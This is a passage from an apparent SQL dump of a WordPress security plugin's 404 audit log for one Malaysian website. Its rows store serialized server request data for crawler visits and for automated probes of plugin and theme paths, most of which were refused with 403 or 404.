Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:113:\"https://bintara.com.my/old/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:91:\"/old/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaX-Cfs3ai5mz5uo0hUafwAAAEo\";s:19:\"REDIRECT_SCRIPT_URI\";s:113:\"https://bintara.com.my/old/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:91:\"/old/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaX-Cfs3ai5mz5uo0hUafwAAAEo\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"5.135.138.188\";s:11:\"REMOTE_PORT\";s:5:\"52791\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:113:\"https://bintara.com.my/old/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:10:\"SCRIPT_URL\";s:91:\"/old/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XaX-Cfs3ai5mz5uo0hUafwAAAEo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571159817.4889\";s:12:\"REQUEST_TIME\";s:10:\"1571159817\";}}','notice','2019-10-15 17:17:00','2019-10-15 17:16:57',35779128,37582208,'https://bintara.com.my/old/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js',1,0,'5.135.138.188'),(28068,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:40:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:25:\"/blog/tag/logitech-rally/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:66:\"Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"https://bintara.com.my/blog/tag/logitech-rally/\";s:19:\"REDIRECT_SCRIPT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaYC9nTLTfzmaEv6rGKLigAAAMs\";s:12:\"REDIRECT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:11:\"REMOTE_ADDR\";s:13:\"54.36.148.222\";s:11:\"REMOTE_PORT\";s:5:\"49944\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"https://bintara.com.my/blog/tag/logitech-rally/\";s:10:\"SCRIPT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaYC9nTLTfzmaEv6rGKLigAAAMs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571160822.9193\";s:12:\"REQUEST_TIME\";s:10:\"1571160822\";}}','notice','2019-10-15 17:33:45','2019-10-15 17:33:43',35425640,37227912,'https://bintara.com.my/blog/tag/logitech-rally/',1,0,'54.36.148.222'),(28069,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3452.0 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"163.172.105.148\";s:11:\"REMOTE_PORT\";s:5:\"64332\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaYDWdwSqwmg3BSzc7@3pQAAAgI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571160922.0043\";s:12:\"REQUEST_TIME\";s:10:\"1571160922\";}}','notice','2019-10-15 17:35:23','2019-10-15 17:35:22',35033528,36837688,'https://bintara.com.my/?page_id=18',1,0,'163.172.105.148'),(28070,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:56:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/wp-content/themes/404.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=b4a9183d91fb71cdc8260f0eb2bf4de9\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:48:\"http://bintara.com.my//wp-content/themes/404.php\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:48:\"https://bintara.com.my/wp-content/themes/404.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:26:\"/wp-content/themes/404.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaYMhnTLTfzmaEv6rGKPqgAAAMM\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:48:\"https://bintara.com.my/wp-content/themes/404.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:26:\"/wp-content/themes/404.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaYMhnTLTfzmaEv6rGKPqgAAAMM\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:14:\"182.110.20.226\";s:11:\"REMOTE_PORT\";s:5:\"57817\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:48:\"https://bintara.com.my/wp-content/themes/404.php\";s:10:\"SCRIPT_URL\";s:26:\"/wp-content/themes/404.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaYMhnTLTfzmaEv6rGKPqgAAAMM\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571163270.4964\";s:12:\"REQUEST_TIME\";s:10:\"1571163270\";}}','notice','2019-10-15 18:14:32','2019-10-15 18:14:30',35065304,36867664,'https://bintara.com.my/wp-content/themes/404.php',1,0,'182.110.20.226'),(28071,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/Admin/404.asp\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=d3b660a1b0cd599a79fec09160ecf32b\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:36:\"http://bintara.com.my//Admin/404.asp\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/Admin/404.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/Admin/404.asp\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaYMyHTLTfzmaEv6rGKPxgAAANM\";s:12:\"REDIRECT_URL\";s:14:\"/Admin/404.asp\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:14:\"182.110.20.226\";s:11:\"REMOTE_PORT\";s:5:\"59968\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/Admin/404.asp\";s:10:\"SCRIPT_URL\";s:14:\"/Admin/404.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaYMyHTLTfzmaEv6rGKPxgAAANM\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571163336.6513\";s:12:\"REQUEST_TIME\";s:10:\"1571163336\";}}','notice','2019-10-15 18:15:38','2019-10-15 18:15:37',35029208,36838000,'https://bintara.com.my/Admin/404.asp',1,0,'182.110.20.226'),(28072,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:89:\"/1/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:111:\"https://bintara.com.my/1/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:89:\"/1/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaYOndwSqwmg3BSzc7@4uQAAAhU\";s:19:\"REDIRECT_SCRIPT_URI\";s:111:\"https://bintara.com.my/1/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:89:\"/1/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaYOndwSqwmg3BSzc7@4uQAAAhU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"64.140.200.40\";s:11:\"REMOTE_PORT\";s:5:\"40124\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:111:\"https://bintara.com.my/1/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:10:\"SCRIPT_URL\";s:89:\"/1/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XaYOndwSqwmg3BSzc7@4uQAAAhU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571163806.0301\";s:12:\"REQUEST_TIME\";s:10:\"1571163806\";}}','notice','2019-10-15 18:23:29','2019-10-15 18:23:26',35777280,37576680,'https://bintara.com.my/1/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js',1,0,'64.140.200.40'),(28073,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:95:\"/newsite/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:117:\"https://bintara.com.my/newsite/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:95:\"/newsite/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaYTWqJ3enRcCPZdox7lTwAAAdA\";s:19:\"REDIRECT_SCRIPT_URI\";s:117:\"https://bintara.com.my/newsite/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:95:\"/newsite/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaYTWqJ3enRcCPZdox7lTwAAAdA\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"159.203.81.46\";s:11:\"REMOTE_PORT\";s:5:\"46978\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:117:\"https://bintara.com.my/newsite/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:10:\"SCRIPT_URL\";s:95:\"/newsite/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaYTWqJ3enRcCPZdox7lTwAAAdA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571165019.0621\";s:12:\"REQUEST_TIME\";s:10:\"1571165019\";}}','notice','2019-10-15 18:43:42','2019-10-15 18:43:39',35679536,37475264,'https://bintara.com.my/newsite/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js',1,0,'159.203.81.46'),(28074,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:90:\"/v2/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:112:\"https://bintara.com.my/v2/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:90:\"/v2/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaYYZKJ3enRcCPZdox7mPwAAAcQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:112:\"https://bintara.com.my/v2/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:90:\"/v2/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaYYZKJ3enRcCPZdox7mPwAAAcQ\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"193.70.2.138\";s:11:\"REMOTE_PORT\";s:5:\"34358\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:112:\"https://bintara.com.my/v2/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:10:\"SCRIPT_URL\";s:90:\"/v2/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XaYYZKJ3enRcCPZdox7mPwAAAcQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571166308.6472\";s:12:\"REQUEST_TIME\";s:10:\"1571166308\";}}','notice','2019-10-15 19:05:11','2019-10-15 